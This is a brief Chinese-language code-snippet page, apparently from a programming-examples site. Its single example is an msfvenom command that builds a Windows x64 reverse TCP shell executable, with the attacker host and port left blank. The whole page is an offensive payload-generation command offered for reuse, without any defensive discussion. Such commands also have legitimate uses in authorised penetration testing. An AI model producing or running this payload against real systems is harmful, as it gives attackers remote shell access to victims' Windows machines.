📜  msfvenom x64 windows 反向 shell - Shell-Bash 代码示例

📅  最后修改于: 2022-03-11 14:51:27.451000             🧑  作者: Mango

代码示例1
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f exe > shell-x64.exe